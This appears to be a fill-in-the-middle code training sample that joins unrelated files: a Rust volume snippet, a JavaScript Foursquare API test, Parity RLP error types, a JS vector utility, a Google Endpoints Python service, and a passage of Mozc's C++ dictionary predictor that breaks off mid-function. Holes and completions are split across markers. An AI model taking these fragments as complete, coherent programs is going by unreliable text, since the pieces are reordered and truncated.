// I'm not sure how to handle overflows, let's saturate for
// now
if v < SOUND_MAX {
*self = Volume(v + 1);
}
}
fn down(&mut self) {
let Volume(v) = *self;
if v > 0 {
*self = Volume(v - 1);
}
}
}<|fim▁end|>
|
fn up(&mut self) {
let Volume(v) = *self;
|
<|file_name|>connect.spec.local.js<|end_file_name|><|fim▁begin|>// this will only run locally to test the connection to foursquare
import chai from 'chai';
import chaiAsPromised from 'chai-as-promised';
import FoursquareConnection from './connect';
import config from 'config';
import nock from 'nock';
chai.should();
chai.use(chaiAsPromised);
const expect = chai.expect;
describe('Live Connection create', () => {
it('should contain empty array', () => {
const connect = new FoursquareConnection();
expect(connect.requests).to.be.array;
expect(connect.requests).to.have.length(0);
});
it('should correctly add url', () => {
const connect = new FoursquareConnection('https://test');
expect(connect.apiUrl).to.equal('https://test');
});
it('should correctly add auth token', () => {
const connect = new FoursquareConnection('https://test', '1234');
expect(connect.accessToken).to.equal('1234');
});
it('should correctly add client keys', () => {
const connect = new FoursquareConnection('https://test', {clientId: 1, clientSecret: 'xyz'});
expect(connect.clientId).to.equal(1);
expect(connect.clientSecret).to.equal('xyz');
});
});
describe('Live Connection post', () => {
it('should error as not implemented', () => {
expect(new FoursquareConnection().post).to.throw('Not implemented yet!');
});
});
describe('Live Connection get venue', () => {
it('should return venue information', (done) => {
const connect = new FoursquareConnection(config.get('venues.api.foursquare.url'), {clientId: config.get('venues.api.foursquare.clientId'), clientSecret: config.get('venues.api.foursquare.clientSecret')}, config.get('venues.api.foursquare.version'));
connect.get('venues/4b474e04f964a520782e26e3');
connect.start().then((data) => {
expect(data).to.have.property('venue');
expect(connect.requests).to.have.length(1);
done();
});
});
it('should fail with bad request', () => {
const connect = new FoursquareConnection(config.get('venues.api.foursquare.url'), {clientId: config.get('venues.api.foursquare.clientId'), clientSecret: config.get('venues.api.foursquare.clientSecret')}, config.get('venues.api.foursquare.version'));
connect.get('venues/balls');
return connect.start().should.eventually.to.be.rejectedWith();
});
it('should reset after start', (done) => {<|fim▁hole|> connect.get('venues/4b474e04f964a520782e26e3');
connect.start(true).then(() => {
expect(connect.requests).to.have.length(0);
done();
});
});
});
describe('Live Connection get venues', () => {
it('should venues given lat lng', (done) => {
const connect = new FoursquareConnection(config.get('venues.api.foursquare.url'), {clientId: config.get('venues.api.foursquare.clientId'), clientSecret: config.get('venues.api.foursquare.clientSecret')}, config.get('venues.api.foursquare.version'));
connect.get('venues/search', {
lat: 40.7,
lng: -74,
radius: 16000,
intent: 'browse'
});
connect.start().then((data) => {
expect(data).to.have.property('venues').with.length;
done();
}).catch((error) => {
});
});
});<|fim▁end|>
|
const connect = new FoursquareConnection(config.get('venues.api.foursquare.url'), {clientId: config.get('venues.api.foursquare.clientId'), clientSecret: config.get('venues.api.foursquare.clientSecret')}, config.get('venues.api.foursquare.version'));
|
<|file_name|>rlperrors.rs<|end_file_name|><|fim▁begin|>// Copyright 2015, 2016 Ethcore (UK) Ltd.
// This file is part of Parity.
// Parity is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
// Parity is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.<|fim▁hole|>// along with Parity. If not, see <http://www.gnu.org/licenses/>.
use std::fmt;
use std::error::Error as StdError;
use rlp::bytes::FromBytesError;
#[derive(Debug, PartialEq, Eq)]
/// Error concerning the RLP decoder.
pub enum DecoderError {
/// Couldn't convert given bytes to an instance of required type.
FromBytesError(FromBytesError),
/// Data has additional bytes at the end of the valid RLP fragment.
RlpIsTooBig,
/// Data has too few bytes for valid RLP.
RlpIsTooShort,
/// Expect an encoded list, RLP was something else.
RlpExpectedToBeList,
/// Expect encoded data, RLP was something else.
RlpExpectedToBeData,
/// Expected a different size list.
RlpIncorrectListLen,
/// Data length number has a prefixed zero byte, invalid for numbers.
RlpDataLenWithZeroPrefix,
/// List length number has a prefixed zero byte, invalid for numbers.
RlpListLenWithZeroPrefix,
/// Non-canonical (longer than necessary) representation used for data or list.
RlpInvalidIndirection,
/// Declared length is inconsistent with data specified after.
RlpInconsistentLengthAndData,
}
impl StdError for DecoderError {
fn description(&self) -> &str {
"builder error"
}
}
impl fmt::Display for DecoderError {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
fmt::Debug::fmt(&self, f)
}
}
impl From<FromBytesError> for DecoderError {
fn from(err: FromBytesError) -> DecoderError {
DecoderError::FromBytesError(err)
}
}<|fim▁end|>
|
// You should have received a copy of the GNU General Public License
|
<|file_name|>utilities.js<|end_file_name|><|fim▁begin|>function Vec2(_x, _y) {
var self = this;
self.x = _x;
self.y = _y;
self.Distance = function (OtherPoint) {
try {
return Math.sqrt(Math.pow(OtherPoint.x - self.x, 2) + Math.pow(OtherPoint.y - self.y, 2));
} catch (e) {
console.error(e);
return false;
}
}
}
<|fim▁hole|>function getMCC(c, e) {
var x;
var y;
if (e.pageX || e.pageY) {
x = e.pageX;
y = e.pageY;
} else {
x = e.clientX + document.body.scrollLeft + document.documentElement.scrollLeft;
y = e.clientY + document.body.scrollTop + document.documentElement.scrollTop;
}
x -= c.offsetLeft + c.clientLeft;
y -= c.offsetTop + c.clientTop;
return new Vec2(x, y);
}<|fim▁end|>
| |
<|file_name|>api_backend_service.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.<|fim▁hole|># See the License for the specific language governing permissions and
# limitations under the License.
#
"""Api serving config collection service implementation.
Contains the implementation for BackendService as defined in api_backend.py.
"""
try:
import json
except ImportError:
import simplejson as json
import logging
from endpoints import api_backend
from endpoints import api_config
from endpoints import api_exceptions
from protorpc import message_types
__all__ = [
'ApiConfigRegistry',
'BackendServiceImpl',
]
class ApiConfigRegistry(object):
"""Registry of active APIs to be registered with Google API Server."""
def __init__(self):
self.__registered_classes = set()
self.__api_configs = set()
self.__api_methods = {}
def register_spi(self, config_contents):
"""Register a single SPI and its config contents.
Args:
config_contents: String containing API configuration.
"""
if config_contents is None:
return
parsed_config = json.loads(config_contents)
self.__register_class(parsed_config)
self.__api_configs.add(config_contents)
self.__register_methods(parsed_config)
def __register_class(self, parsed_config):
"""Register the class implementing this config, so we only add it once.
Args:
parsed_config: The JSON object with the API configuration being added.
Raises:
ApiConfigurationError: If the class has already been registered.
"""
methods = parsed_config.get('methods')
if not methods:
return
service_classes = set()
for method in methods.itervalues():
rosy_method = method.get('rosyMethod')
if rosy_method and '.' in rosy_method:
method_class = rosy_method.split('.', 1)[0]
service_classes.add(method_class)
for service_class in service_classes:
if service_class in self.__registered_classes:
raise api_config.ApiConfigurationError(
'SPI class %s has already been registered.' % service_class)
self.__registered_classes.add(service_class)
def __register_methods(self, parsed_config):
"""Register all methods from the given api config file.
Methods are stored in a map from method_name to rosyMethod,
the name of the ProtoRPC method to be called on the backend.
If no rosyMethod was specified the value will be None.
Args:
parsed_config: The JSON object with the API configuration being added.
"""
methods = parsed_config.get('methods')
if not methods:
return
for method_name, method in methods.iteritems():
self.__api_methods[method_name] = method.get('rosyMethod')
def lookup_api_method(self, api_method_name):
"""Looks an API method up by name to find the backend method to call.
Args:
api_method_name: Name of the method in the API that was called.
Returns:
Name of the ProtoRPC method called on the backend, or None if not found.
"""
return self.__api_methods.get(api_method_name)
def all_api_configs(self):
"""Return a list of all API configration specs as registered above."""
return list(self.__api_configs)
class BackendServiceImpl(api_backend.BackendService):
"""Implementation of BackendService."""
def __init__(self, api_config_registry, app_revision):
"""Create a new BackendService implementation.
Args:
api_config_registry: ApiConfigRegistry to register and look up configs.
app_revision: string containing the current app revision.
"""
self.__api_config_registry = api_config_registry
self.__app_revision = app_revision
@staticmethod
def definition_name():
"""Override definition_name so that it is not BackendServiceImpl."""
return api_backend.BackendService.definition_name()
def getApiConfigs(self, request):
"""Return a list of active APIs and their configuration files.
Args:
request: A request which may contain an app revision
Returns:
ApiConfigList: A list of API config strings
"""
if request.appRevision and request.appRevision != self.__app_revision:
raise api_exceptions.BadRequestException(
message='API backend app revision %s not the same as expected %s' % (
self.__app_revision, request.appRevision))
configs = self.__api_config_registry.all_api_configs()
return api_backend.ApiConfigList(items=configs)
def logMessages(self, request):
"""Write a log message from the Swarm FE to the log.
Args:
request: A log message request.
Returns:
Void message.
"""
Level = api_backend.LogMessagesRequest.LogMessage.Level
log = logging.getLogger(__name__)
for message in request.messages:
level = message.level if message.level is not None else Level.info
record = logging.LogRecord(name=__name__, level=level.number, pathname='',
lineno='', msg=message.message, args=None,
exc_info=None)
log.handle(record)
return message_types.VoidMessage()<|fim▁end|>
| |
<|file_name|>dictionary_predictor.cc<|end_file_name|><|fim▁begin|>// Copyright 2010-2021, Google Inc.
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are
// met:
//
// * Redistributions of source code must retain the above copyright
// notice, this list of conditions and the following disclaimer.
// * Redistributions in binary form must reproduce the above
// copyright notice, this list of conditions and the following disclaimer
// in the documentation and/or other materials provided with the
// distribution.
// * Neither the name of Google Inc. nor the names of its
// contributors may be used to endorse or promote products derived from
// this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#include "prediction/dictionary_predictor.h"
#include <algorithm>
#include <cctype>
#include <climits> // INT_MAX
#include <cmath>
#include <cstdint>
#include <list>
#include <map>
#include <set>
#include <string>
#include <utility>
#include <vector>
#include "base/japanese_util.h"
#include "base/logging.h"
#include "base/number_util.h"
#include "base/util.h"
#include "composer/composer.h"
#include "converter/connector.h"
#include "converter/converter_interface.h"
#include "converter/immutable_converter_interface.h"
#include "converter/node_list_builder.h"
#include "converter/segmenter.h"
#include "converter/segments.h"
#include "dictionary/dictionary_interface.h"
#include "dictionary/pos_matcher.h"
#include "prediction/predictor_interface.h"
#include "prediction/suggestion_filter.h"
#include "prediction/zero_query_dict.h"
#include "protocol/commands.pb.h"
#include "protocol/config.pb.h"
#include "request/conversion_request.h"
#include "usage_stats/usage_stats.h"
#include "absl/container/flat_hash_map.h"
#include "absl/flags/flag.h"
#include "absl/strings/match.h"
#include "absl/strings/string_view.h"
#ifndef NDEBUG
#define MOZC_DEBUG
#define MOZC_WORD_LOG_MESSAGE(message) \
absl::StrCat(__FILE__, ":", __LINE__, " ", message, "\n")
#define MOZC_WORD_LOG(result, message) \
(result).log.append(MOZC_WORD_LOG_MESSAGE(message))
#else // NDEBUG
#define MOZC_WORD_LOG(result, message) \
{}
#endif // NDEBUG
namespace mozc {
namespace {
using ::mozc::commands::Request;
using ::mozc::dictionary::DictionaryInterface;
using ::mozc::dictionary::PosMatcher;
using ::mozc::dictionary::Token;
using ::mozc::usage_stats::UsageStats;
// Used to emulate positive infinity for cost. This value is set for those
// candidates that are thought to be aggressive; thus we can eliminate such
// candidates from suggestion or prediction. Note that for this purpose we don't
// want to use INT_MAX because someone might further add penalty after cost is
// set to INT_MAX, which leads to overflow and consequently aggressive
// candidates would appear in the top results.
constexpr int kInfinity = (2 << 20);
// Note that PREDICTION mode is much slower than SUGGESTION.
// Number of prediction calls should be minimized.
constexpr size_t kSuggestionMaxResultsSize = 256;
constexpr size_t kPredictionMaxResultsSize = 100000;
bool IsEnableNewSpatialScoring(const ConversionRequest &request) {
return request.request()
.decoder_experiment_params()
.enable_new_spatial_scoring();
}
// Returns true if the |target| may be a redundant result.
bool MaybeRedundant(const std::string &reference, const std::string &target) {
return absl::StartsWith(target, reference);
}
bool IsLatinInputMode(const ConversionRequest &request) {
return (request.has_composer() &&
(request.composer().GetInputMode() == transliteration::HALF_ASCII ||
request.composer().GetInputMode() == transliteration::FULL_ASCII));
}
bool IsQwertyMobileTable(const ConversionRequest &request) {
const auto table = request.request().special_romanji_table();
return (table == commands::Request::QWERTY_MOBILE_TO_HIRAGANA ||
table == commands::Request::QWERTY_MOBILE_TO_HALFWIDTHASCII);
}
bool IsLanguageAwareInputEnabled(const ConversionRequest &request) {
const auto lang_aware = request.request().language_aware_input();
return lang_aware == commands::Request::LANGUAGE_AWARE_SUGGESTION;
}
// Returns true if |segments| contains number history.
// Normalized number will be set to |number_key|
// Note:
// Now this function supports arabic number candidates only and
// we don't support kanji number candidates for now.
// This is because we have several kanji number styles, for example,
// "一二", "十二", "壱拾弐", etc for 12.
// TODO(toshiyuki): Define the spec and support Kanji.
bool GetNumberHistory(const Segments &segments, std::string *number_key) {
DCHECK(number_key);
const size_t history_size = segments.history_segments_size();
if (history_size <= 0) {
return false;
}
const Segment &last_segment = segments.history_segment(history_size - 1);
DCHECK_GT(last_segment.candidates_size(), 0);
const std::string &history_value = last_segment.candidate(0).value;
if (!NumberUtil::IsArabicNumber(history_value)) {
return false;
}
japanese_util::FullWidthToHalfWidth(history_value, number_key);
return true;
}
bool IsMixedConversionEnabled(const commands::Request &request) {
return request.mixed_conversion();
}
bool IsTypingCorrectionEnabled(const ConversionRequest &request) {
return request.config().use_typing_correction();
}
bool HasHistoryKeyLongerThanOrEqualTo(const Segments &segments,
size_t utf8_len) {
const size_t history_segments_size = segments.history_segments_size();
if (history_segments_size == 0) {
return false;
}
const Segment &history_segment =
segments.history_segment(history_segments_size - 1);
if (history_segment.candidates_size() == 0) {
return false;
}
return Util::CharsLen(history_segment.candidate(0).key) >= utf8_len;
}
bool IsLongKeyForRealtimeCandidates(const Segments &segments) {
constexpr int kFewResultThreshold = 8;
return (segments.segments_size() > 0 &&
Util::CharsLen(segments.segment(0).key()) >= kFewResultThreshold);
}
size_t GetMaxSizeForRealtimeCandidates(const ConversionRequest &request,
const Segments &segments,
bool is_long_key) {
const auto &segment = segments.conversion_segment(0);
const size_t size = (request.max_dictionary_prediction_candidates_size() -
segment.candidates_size());
return is_long_key ? std::min<size_t>(size, 8) : size;
}
size_t GetDefaultSizeForRealtimeCandidates(bool is_long_key) {
return is_long_key ? 5 : 10;
}
ConversionRequest GetConversionRequestForRealtimeCandidates(
const ConversionRequest &request, size_t realtime_candidates_size,
size_t current_candidates_size) {
ConversionRequest ret = request;
ret.set_max_conversion_candidates_size(current_candidates_size +
realtime_candidates_size);
return ret;
}
} // namespace
class DictionaryPredictor::PredictiveLookupCallback
: public DictionaryInterface::Callback {
public:
PredictiveLookupCallback(DictionaryPredictor::PredictionTypes types,
size_t limit, size_t original_key_len,
const std::set<std::string> *subsequent_chars,
Segment::Candidate::SourceInfo source_info,
int unknown_id,
absl::string_view non_expanded_original_key,
const SpatialCostParams &spatial_cost_params,
std::vector<DictionaryPredictor::Result> *results)
: penalty_(0),
types_(types),
limit_(limit),
original_key_len_(original_key_len),
subsequent_chars_(subsequent_chars),
source_info_(source_info),
unknown_id_(unknown_id),
non_expanded_original_key_(non_expanded_original_key),
spatial_cost_params_(spatial_cost_params),
results_(results) {}
PredictiveLookupCallback(const PredictiveLookupCallback &) = delete;
PredictiveLookupCallback &operator=(const PredictiveLookupCallback &) =
delete;
ResultType OnKey(absl::string_view key) override {
if (subsequent_chars_ == nullptr) {
return TRAVERSE_CONTINUE;
}
// If |subsequent_chars_| was provided, check if the substring of |key|
// obtained by removing the original lookup key starts with a string in the
// set. For example, if original key is "he" and "hello" was found,
// continue traversing only when one of "l", "ll", or "llo" is in
// |subsequent_chars_|.
// Implementation note: Although absl::StartsWith is called at most N times
// where N = subsequent_chars_.size(), N is very small in practice, less
// than 10. Thus, this linear order algorithm is fast enough.
// Theoretically, we can construct a trie of strings in |subsequent_chars_|
// to get more performance but it's overkill here.
// TODO(noriyukit): std::vector<string> would be better than set<string>.
// To this end, we need to fix Composer as well.
const absl::string_view rest = absl::ClippedSubstr(key, original_key_len_);
for (const std::string &chr : *subsequent_chars_) {
if (absl::StartsWith(rest, chr)) {
return TRAVERSE_CONTINUE;
}
}
return TRAVERSE_NEXT_KEY;
}
ResultType OnActualKey(absl::string_view key, absl::string_view actual_key,
int num_expanded) override {
penalty_ = 0;
if (num_expanded > 0 ||
(!non_expanded_original_key_.empty() &&
!absl::StartsWith(actual_key, non_expanded_original_key_))) {
penalty_ = spatial_cost_params_.GetPenalty(key);
}
return TRAVERSE_CONTINUE;
}
ResultType OnToken(absl::string_view key, absl::string_view actual_key,
const Token &token) override {
// If the token is from user dictionary and its POS is unknown, it is
// suggest-only words. Such words are looked up only when their keys
// exactly match |key|. Otherwise, unigram suggestion can be annoying. For
// example, suppose a user registers their email address as める. Then,
// we don't want to show the email address from め but exactly from める.
if ((token.attributes & Token::USER_DICTIONARY) != 0 &&
token.lid == unknown_id_) {
const auto orig_key = absl::ClippedSubstr(key, 0, original_key_len_);
if (token.key != orig_key) {
return TRAVERSE_CONTINUE;
}
}
results_->push_back(Result());
results_->back().InitializeByTokenAndTypes(token, types_);
results_->back().wcost += penalty_;
results_->back().source_info |= source_info_;
return (results_->size() < limit_) ? TRAVERSE_CONTINUE : TRAVERSE_DONE;
}
protected:
int32_t penalty_;
const DictionaryPredictor::PredictionTypes types_;
const size_t limit_;
const size_t original_key_len_;
const std::set<std::string> *subsequent_chars_;
const Segment::Candidate::SourceInfo source_info_;
const int unknown_id_;
absl::string_view non_expanded_original_key_;
const SpatialCostParams spatial_cost_params_;
std::vector<DictionaryPredictor::Result> *results_;
};
class DictionaryPredictor::PredictiveBigramLookupCallback
: public PredictiveLookupCallback {
public:
PredictiveBigramLookupCallback(
DictionaryPredictor::PredictionTypes types, size_t limit,
size_t original_key_len, const std::set<std::string> *subsequent_chars,
absl::string_view history_value,
Segment::Candidate::SourceInfo source_info, int unknown_id,
absl::string_view non_expanded_original_key,
const SpatialCostParams spatial_cost_params,
std::vector<DictionaryPredictor::Result> *results)
: PredictiveLookupCallback(types, limit, original_key_len,
subsequent_chars, source_info, unknown_id,
non_expanded_original_key, spatial_cost_params,
results),
history_value_(history_value) {}
PredictiveBigramLookupCallback(const PredictiveBigramLookupCallback &) =
delete;
PredictiveBigramLookupCallback &operator=(
const PredictiveBigramLookupCallback &) = delete;
ResultType OnToken(absl::string_view key, absl::string_view expanded_key,
const Token &token) override {
// Skip the token if its value doesn't start with the previous user input,
// |history_value_|.
if (!absl::StartsWith(token.value, history_value_) ||
token.value.size() <= history_value_.size()) {
return TRAVERSE_CONTINUE;
}
ResultType result_type =
PredictiveLookupCallback::OnToken(key, expanded_key, token);
return result_type;
}
private:
absl::string_view history_value_;
};
// Comparator for sorting prediction candidates.
// If we have words A and AB, for example "六本木" and "六本木ヒルズ",
// assume that cost(A) < cost(AB).
class DictionaryPredictor::ResultWCostLess {
public:
bool operator()(const DictionaryPredictor::Result &lhs,
const DictionaryPredictor::Result &rhs) const {
return lhs.wcost < rhs.wcost;
}
};
class DictionaryPredictor::ResultCostLess {
public:
bool operator()(const DictionaryPredictor::Result &lhs,
const DictionaryPredictor::Result &rhs) const {
return lhs.cost > rhs.cost;
}
};
DictionaryPredictor::DictionaryPredictor(
const DataManagerInterface &data_manager,
const ConverterInterface *converter,
const ImmutableConverterInterface *immutable_converter,
const DictionaryInterface *dictionary,
const DictionaryInterface *suffix_dictionary, const Connector *connector,
const Segmenter *segmenter, const PosMatcher *pos_matcher,
const SuggestionFilter *suggestion_filter)
: converter_(converter),
immutable_converter_(immutable_converter),
dictionary_(dictionary),
suffix_dictionary_(suffix_dictionary),
connector_(connector),
segmenter_(segmenter),
suggestion_filter_(suggestion_filter),
counter_suffix_word_id_(pos_matcher->GetCounterSuffixWordId()),
general_symbol_id_(pos_matcher->GetGeneralSymbolId()),
unknown_id_(pos_matcher->GetUnknownId()),
predictor_name_("DictionaryPredictor") {
absl::string_view zero_query_token_array_data;
absl::string_view zero_query_string_array_data;
absl::string_view zero_query_number_token_array_data;
absl::string_view zero_query_number_string_array_data;
data_manager.GetZeroQueryData(&zero_query_token_array_data,
&zero_query_string_array_data,
&zero_query_number_token_array_data,
&zero_query_number_string_array_data);
zero_query_dict_.Init(zero_query_token_array_data,
zero_query_string_array_data);
zero_query_number_dict_.Init(zero_query_number_token_array_data,
zero_query_number_string_array_data);
}
DictionaryPredictor::~DictionaryPredictor() {}
void DictionaryPredictor::Finish(const ConversionRequest &request,
Segments *segments) {
if (segments->request_type() == Segments::REVERSE_CONVERSION) {
// Do nothing for REVERSE_CONVERSION.
return;
}
const Segment &segment = segments->conversion_segment(0);
if (segment.candidates_size() < 1) {
VLOG(2) << "candidates size < 1";
return;
}
const Segment::Candidate &candidate = segment.candidate(0);
if (segment.segment_type() != Segment::FIXED_VALUE) {
VLOG(2) << "segment is not FIXED_VALUE" << candidate.value;
return;
}
MaybeRecordUsageStats(candidate);
}
void DictionaryPredictor::MaybeRecordUsageStats(
const Segment::Candidate &candidate) const {
if (candidate.source_info &
Segment::Candidate::DICTIONARY_PREDICTOR_ZERO_QUERY_NONE) {
UsageStats::IncrementCount("CommitDictionaryPredictorZeroQueryTypeNone");
}
if (candidate.source_info &
Segment::Candidate::DICTIONARY_PREDICTOR_ZERO_QUERY_NUMBER_SUFFIX) {
UsageStats::IncrementCount(
"CommitDictionaryPredictorZeroQueryTypeNumberSuffix");
}
if (candidate.source_info &
Segment::Candidate::DICTIONARY_PREDICTOR_ZERO_QUERY_EMOTICON) {
UsageStats::IncrementCount(
"CommitDictionaryPredictorZeroQueryTypeEmoticon");
}
if (candidate.source_info &
Segment::Candidate::DICTIONARY_PREDICTOR_ZERO_QUERY_EMOJI) {
UsageStats::IncrementCount("CommitDictionaryPredictorZeroQueryTypeEmoji");
}
if (candidate.source_info &
Segment::Candidate::DICTIONARY_PREDICTOR_ZERO_QUERY_BIGRAM) {
UsageStats::IncrementCount("CommitDictionaryPredictorZeroQueryTypeBigram");
}
if (candidate.source_info &
Segment::Candidate::DICTIONARY_PREDICTOR_ZERO_QUERY_SUFFIX) {
UsageStats::IncrementCount("CommitDictionaryPredictorZeroQueryTypeSuffix");
}
}
bool DictionaryPredictor::PredictForRequest(const ConversionRequest &request,
Segments *segments) const {
if (segments == nullptr) {
return false;
}
if (segments->request_type() == Segments::CONVERSION) {
VLOG(2) << "request type is CONVERSION";
return false;
}
if (segments->conversion_segments_size() < 1) {
VLOG(2) << "segment size < 1";
return false;
}
std::vector<Result> results;
// Mixed conversion is the feature that mixes prediction and
// conversion, meaning that results may include the candidates whose
// key is exactly the same as the composition. This mode is used in mobile.
const bool is_mixed_conversion = IsMixedConversionEnabled(request.request());
AggregatePredictionForRequest(request, segments, &results);
if (results.empty()) {
return false;
}
if (is_mixed_conversion) {
SetPredictionCostForMixedConversion(*segments, &results);
if (!IsEnableNewSpatialScoring(request)) {
ApplyPenaltyForKeyExpansion(*segments, &results);
}
    // Currently, we don't have the spelling correction feature in
    // the mixed conversion mode, so RemoveMissSpelledCandidates() is
    // not called.
return AddPredictionToCandidates(
request,
true, // Include exact key result even if it's a bad suggestion.
segments, &results);
}
// Normal prediction.
SetPredictionCost(*segments, &results);
if (!IsEnableNewSpatialScoring(request)) {
ApplyPenaltyForKeyExpansion(*segments, &results);
}
const std::string &input_key = segments->conversion_segment(0).key();
const size_t input_key_len = Util::CharsLen(input_key);
RemoveMissSpelledCandidates(input_key_len, &results);
return AddPredictionToCandidates(request, false, // Remove exact key result.
segments, &results);
}
DictionaryPredictor::PredictionTypes
DictionaryPredictor::AggregatePredictionForRequest(
const ConversionRequest &request, Segments *segments,
std::vector<Result> *results) const {
const bool is_mixed_conversion = IsMixedConversionEnabled(request.request());
// In mixed conversion mode, the number of real time candidates is increased.
const size_t realtime_max_size =
GetRealtimeCandidateMaxSize(request, *segments, is_mixed_conversion);
const auto &unigram_config = GetUnigramConfig(request, *segments);
return AggregatePrediction(request, realtime_max_size, unigram_config,
segments, results);
}
DictionaryPredictor::UnigramConfig DictionaryPredictor::GetUnigramConfig(
const ConversionRequest &request, const Segments &segments) const {
const bool is_mixed_conversion = IsMixedConversionEnabled(request.request());
if (IsLatinInputMode(request)) {
    // For a SUGGESTION request in Desktop, we don't look up English words when
    // the key length is one.
const size_t min_key_len_for_latin_input =
(is_mixed_conversion || segments.request_type() == Segments::PREDICTION)
? 1
: 2;
return {&DictionaryPredictor::AggregateUnigramCandidateForLatinInput,
min_key_len_for_latin_input};
}
if (is_mixed_conversion) {
// In mixed conversion mode, we want to show unigram candidates even for
// short keys to emulate PREDICTION mode.
constexpr size_t kMinUnigramKeyLen = 1;
return {&DictionaryPredictor::AggregateUnigramCandidateForMixedConversion,
kMinUnigramKeyLen};
}
// Normal prediction.
const size_t min_unigram_key_len =
(segments.request_type() == Segments::PREDICTION) ? 1 : 3;
return {&DictionaryPredictor::AggregateUnigramCandidate, min_unigram_key_len};
}
DictionaryPredictor::PredictionTypes DictionaryPredictor::AggregatePrediction(
const ConversionRequest &request, size_t realtime_max_size,
const UnigramConfig &unigram_config, Segments *segments,
std::vector<Result> *results) const {
DCHECK(segments);
DCHECK(results);
// Zero query prediction.
if (segments->conversion_segment(0).key().empty()) {
return AggregatePredictionForZeroQuery(request, segments, results);
}
const std::string &key = segments->conversion_segment(0).key();
const size_t key_len = Util::CharsLen(key);
// TODO(toshiyuki): Check if we can remove this SUGGESTION check.
// i.e. can we return NO_PREDICTION here for both of SUGGESTION and
// PREDICTION?
if (segments->request_type() == Segments::SUGGESTION) {
if (!request.config().use_dictionary_suggest()) {
VLOG(2) << "no_dictionary_suggest";
return NO_PREDICTION;
}
// Never trigger prediction if the key looks like zip code.
if (DictionaryPredictor::IsZipCodeRequest(key) && key_len < 6) {
return NO_PREDICTION;
}
}
PredictionTypes selected_types = NO_PREDICTION;
if (ShouldAggregateRealTimeConversionResults(request, *segments)) {
AggregateRealtimeConversion(request, realtime_max_size, segments, results);
selected_types |= REALTIME;
}
// In partial suggestion or prediction, only realtime candidates are used.
if (segments->request_type() == Segments::PARTIAL_SUGGESTION ||
segments->request_type() == Segments::PARTIAL_PREDICTION) {
return selected_types;
}
// Add unigram candidates.
const size_t min_unigram_key_len = unigram_config.min_key_len;
if (key_len >= min_unigram_key_len) {
const auto &unigram_fn = unigram_config.unigram_fn;
PredictionType type = (this->*unigram_fn)(request, *segments, results);
selected_types |= type;
}
// Add bigram candidates.
constexpr int kMinHistoryKeyLen = 3;
if (HasHistoryKeyLongerThanOrEqualTo(*segments, kMinHistoryKeyLen)) {
AggregateBigramPrediction(request, *segments,
Segment::Candidate::SOURCE_INFO_NONE, results);
selected_types |= BIGRAM;
}
// Add english candidates.
if (IsLanguageAwareInputEnabled(request) && IsQwertyMobileTable(request) &&
key_len >= min_unigram_key_len) {
AggregateEnglishPredictionUsingRawInput(request, *segments, results);
selected_types |= ENGLISH;
}
// Add typing correction candidates.
constexpr int kMinTypingCorrectionKeyLen = 3;
if (IsTypingCorrectionEnabled(request) &&
key_len >= kMinTypingCorrectionKeyLen) {
AggregateTypeCorrectingPrediction(request, *segments, results);
selected_types |= TYPING_CORRECTION;
}
return selected_types;
}
bool DictionaryPredictor::AddPredictionToCandidates(
const ConversionRequest &request, bool include_exact_key,
Segments *segments, std::vector<Result> *results) const {
DCHECK(segments);
DCHECK(results);
const std::string &input_key = segments->conversion_segment(0).key();
const size_t input_key_len = Util::CharsLen(input_key);
std::string history_key, history_value;
GetHistoryKeyAndValue(*segments, &history_key, &history_value);
// exact_bigram_key does not contain ambiguity expansion, because
// this is used for exact matching for the key.
const std::string exact_bigram_key = history_key + input_key;
Segment *segment = segments->mutable_conversion_segment(0);
DCHECK(segment);
// Instead of sorting all the results, we construct a heap.
// This is done in linear time and
// we can pop as many results as we need efficiently.
std::make_heap(results->begin(), results->end(), ResultCostLess());
const size_t size = std::min(
request.max_dictionary_prediction_candidates_size(), results->size());
int added = 0;
std::set<std::string> seen;
int added_suffix = 0;
bool cursor_at_tail =
request.has_composer() &&
request.composer().GetCursor() == request.composer().GetLength();
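  // Maps a candidate value to the union of prediction types that produced it.
  // Used only to build debug descriptions below.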
absl::flat_hash_map<std::string, int32_t> merged_types;
#ifndef NDEBUG
const bool is_debug = true;
#else // NDEBUG
// TODO(taku): Sets more advanced debug info depending on the verbose_level.
const bool is_debug = request.config().verbose_level() >= 1;
#endif // NDEBUG
if (is_debug) {
for (const auto &result : *results) {
if (!result.removed) {
merged_types[result.value] |= result.types;
}
}
}
auto add_candidate = [&](const Result &result, const std::string &key,
const std::string &value,
Segment::Candidate *candidate) {
DCHECK(candidate);
candidate->Init();
candidate->content_key = key;
candidate->content_value = value;
candidate->key = key;
